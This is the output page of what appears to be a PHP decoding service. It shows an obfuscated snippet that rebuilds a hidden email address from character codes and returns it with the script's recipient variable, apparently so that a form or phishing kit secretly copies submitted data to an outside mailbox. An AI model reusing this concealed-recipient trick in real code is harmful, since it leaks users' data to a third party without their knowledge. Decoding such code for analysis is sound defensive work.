Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$sorter = ""; $array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,1..
Decoded Output download
<? $sorter = "";
$array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
$count = count($array);
for ($i = 0; $i < $count; $i++) {
$sorter .= chr($array[$i]);
}
return array($sorter, $GLOBALS['recipient']); ?>
Did this file decode correctly?
Original Code
$sorter = "";
$array = array(114,101,115,117,108,116,98,111,120,49,52,64,103,109,97,105,108,46,99,111,109);
$count = count($array);
for ($i = 0; $i < $count; $i++) {
$sorter .= chr($array[$i]);
}
return array($sorter, $GLOBALS['recipient']);
Function Calls
chr | 21 |
count | 1 |
Stats
MD5 | aec3f724cad187488bb47d611b78acb1 |
Eval Count | 0 |
Decode Time | 84 ms |